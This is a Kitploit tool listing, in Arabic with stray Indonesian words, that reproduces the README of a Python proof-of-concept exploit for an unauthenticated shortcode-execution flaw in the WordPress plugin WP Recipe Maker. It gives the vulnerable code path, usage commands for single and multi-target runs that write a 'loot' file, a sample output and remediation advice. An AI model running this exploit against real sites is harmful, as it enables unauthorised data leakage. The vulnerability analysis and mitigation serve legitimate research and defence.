Skip to content
KitploitKITPLOIT
أدواتالمدونة
إرسال
أدواتالمدونة
إرسال

أدوات الاختراق واختبار الاختراق والأمن السيبراني لترسانتك الأمنية!

Kitploit هو دليل لأدوات الاختراق والأمن السيبراني واختبار الاختراق. اكتشف آخر تحديثات المشاريع للعثور على الثغرات وتحليل الأنظمة وأتمتة الاختبارات وتعزيز أمنك.

··الخلاصات·اتصال·الخصوصية·© 2026 Kitploit

دليل الأدوات

الفئات

عرض جميع الفئات
Loading categories
By-Poloss..-.CVE-2026-89274 — استغلال إثبات مفهوم بلغة Python للثغرة CVE-2026-89274، وهي ثغرة تنفيذ شورت كود عشوائي دون مصادقة في إضافة WordPress WP Recipe Maker <= 10.8.1 عبر تعليقات الوصفات. | Kitploit
أدوات/GitHubGitHub/polosss/by-poloss..-.cve-2026-89274
ماسحات الثغرات الأمنيةتحليل الثغرات الأمنيةالاستغلالاستغلال تطبيقات الويبأمن الويباختبار الاختراق
GitHubpolosss/by-poloss..-.cve-2026-89274

By-Poloss..-.CVE-2026-89274

استغلال إثبات مفهوم بلغة Python للثغرة CVE-2026-89274، وهي ثغرة تنفيذ شورت كود عشوائي دون مصادقة في إضافة WordPress WP Recipe Maker <= 10.8.1 عبر تعليقات الوصفات.

عرض المستودع
منذ 5س 3دلم تتم المراجعة بعد

الأكثر شعبية

عرض الكل →

اكتشف الأدوات الأكثر استخدامًا من قبل مجتمعنا.

استكشف جميع الأدوات

تصفح مجموعتنا من الأدوات

عرض جميع الأدوات →
مشاركة

CVE-2026-89274 PoC

Poloss : @WPEF0

status python license

Proof-of-Concept exploit لـ CVE-2026-89274 — ثغرة Unauthenticated Arbitrary Shortcode Execution في إضافة WordPress WP Recipe Maker الإصدار ≤ 10.8.1.

⚠️ تحذير قانوني وأخلاقي هذا السكريبت مُقدَّم فقط لأبحاث الأمن في بيئة محلية (localhost/lab) ولا يجوز استخدامه ضد أنظمة لا تملكها أو دون إذن كتابي. المؤلف غير مسؤول عن أي إساءة استخدام. قد يُعدّ الاستخدام ضد أنظمة طرف ثالث دون تصريح مخالفًا للقانون الجنائي.


📌 ملخص الثغرة

FieldNilai
CVE IDCVE-2026-89274
TargetWP Recipe Maker (wp-recipe-maker) ≤ 10.8.1
KelasCode Injection (CWE-94) — Arbitrary Shortcode Execution
CVSS v3.19.1 Critical (AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:N)
Vektorمحتوى تعليقات الوصفة (unauthenticated)
Sinkdo_shortcode() في class-wprm-metadata.php
Dampakتنفيذ shortcode من جهة الخادم → تسريب البيانات عبر JSON-LD العام
AuthorPoloss

Root Cause (patch-diff 10.8.1 → 10.8.4)

includes/public/class-wprm-metadata.php :: sanitize_metadata()

Vulnerable (10.8.1):

root@kitploit:~
$sanitized = strip_shortcodes( wp_strip_all_tags( do_shortcode( $metadata ) ) );

do_shortcode() ينفّذ الـ shortcode أولاً، ثم strip_shortcodes() ينظّف المخرجات فقط — لا توجد أي حماية على الإطلاق.

Patched (10.8.4):

root@kitploit:~
$sanitized = strip_shortcodes( wp_strip_all_tags(
    WPRM_Instacart::do_shortcode_safe( $metadata ) ) );

مسار البيانات

root@kitploit:~
comment_content (komentar publik pada post resep)
   └─> reviewBody        (class-wprm-metadata.php:1017)
       └─> $metadata['review'][]   (line 1028)
           └─> sanitize_metadata( get_metadata( $recipe ) )  (line 374)
               └─> do_shortcode( $reviewBody )  ← SINK EKSEKUSI
                   └─> wp_json_encode() ke <script type="application/ld+json">

المتطلبات المسبقة

  1. التعليق يحمل الحقل wprm-comment-rating (يُملأ عبر نموذج التعليق).
  2. التعليق مُعتمَد (auto-approve أو يدويًا بواسطة المشرف).
  3. لا حاجة إلى مصادقة.

⚙️ التثبيت

root@kitploit:~
git clone <repo-url>
cd <repo>
python3 -m venv .venv
source .venv/bin/activate     # Windows: .venv\Scripts\activate
# Tidak ada dependensi eksternal — hanya standard library Python 3.

المتطلبات: Python 3.8+.


🚀 الاستخدام

هدف واحد

root@kitploit:~
python3 CVE-2026-89274.py -u http://localhost:8080 -p 10 \
    --shortcode '[wprm-recipe-name id=11]' \
    --marker 'PoC Recipe'

أهداف متعددة (ملف)

تنسيق targets.txt (واحد لكل سطر، url[,post_id]):

root@kitploit:~
http://lab1.local,10
http://lab2.local,25
# baris komentar diabaikan
http://lab3.local,7
root@kitploit:~
python3 CVE-2026-89274.py -f targets.txt -t 10 -o loot.json

خيارات CLI

FlagDefaultDeskripsi
-u, --url—عنوان URL لهدف واحد
-f, --file—ملف قائمة الأهداف (url[,post_id] لكل سطر)
-p, --post10معرّف المنشور الذي يحتوي على الوصفة
-t, --threads5عدد خيوط العمل (worker threads)
-o, --outputcve-2026-89274-loot.jsonملف مخرجات JSON
--shortcode[wprm-recipe-name id=11]حمولة الـ shortcode التي تُنفَّذ
--markerPoC Recipeسلسلة فرعية لإثبات التنفيذ في reviewBody
--rating5قيمة تقييم WPRM
--timeout25مهلة كل طلب (بالثواني)

🔍 آلية عمل السكريبت

  1. Baseline — GET لصفحة المنشور، استخراج كتلة <script type="application/ld+json">، جمع reviewBody.
  2. إرسال التعليق — POST إلى /wp-comments-post.php مع الحمولة + الحقل wprm-comment-rating.
  3. Polling — إعادة GET للصفحة عدة مرات لاكتشاف الموافقة التلقائية على التعليق.
  4. التحقق — إذا ظهر --marker في reviewBody → EXPLOITED. وإلا → PENDING_APPROVAL.
  5. الإخراج — حفظ النتائج في JSON.

حالات الإخراج

StatusArti
EXPLOITEDتم تنفيذ الـ shortcode وتسريب المخرجات إلى JSON-LD العام
PENDING_APPROVALتم إرسال التعليق، بانتظار موافقة المشرف
FAILالصفحة غير قابلة للوصول / تم رفض التعليق / خطأ

📄 مثال على مخرجات JSON

root@kitploit:~
[
  {
    "target": "http://localhost:8080",
    "post_id": 10,
    "shortcode": "[wprm-recipe-name id=11]",
    "marker": "PoC Recipe",
    "author": "poc1716000000",
    "review_bodies": ["PoC Recipe"],
    "status": "EXPLOITED",
    "evidence": "PoC Recipe",
    "note": "shortcode executed server-side; output leaked into public JSON-LD reviewBody",
    "elapsed": 9.12
  }
]

🛡️ المعالجة

  • الترقية إلى WP Recipe Maker ≥ 10.8.4.
  • مؤقتًا، عطّل التعليقات على منشورات الوصفات أو اضبط comment_moderation = 1 وراجع التعليقات بصرامة.
  • طبّق قاعدة WAF لحظر صيغة الـ shortcode ([...]) في حقل التعليقات.
  • راجع التعليقات القديمة بحثًا عن حمولات shortcode مشبوهة.

📁 هيكل المستودع

root@kitploit:~
.
├── CVE-2026-89274.py           # exploit utama
└── README.md                   # dokumen ini
تنزيل الأداة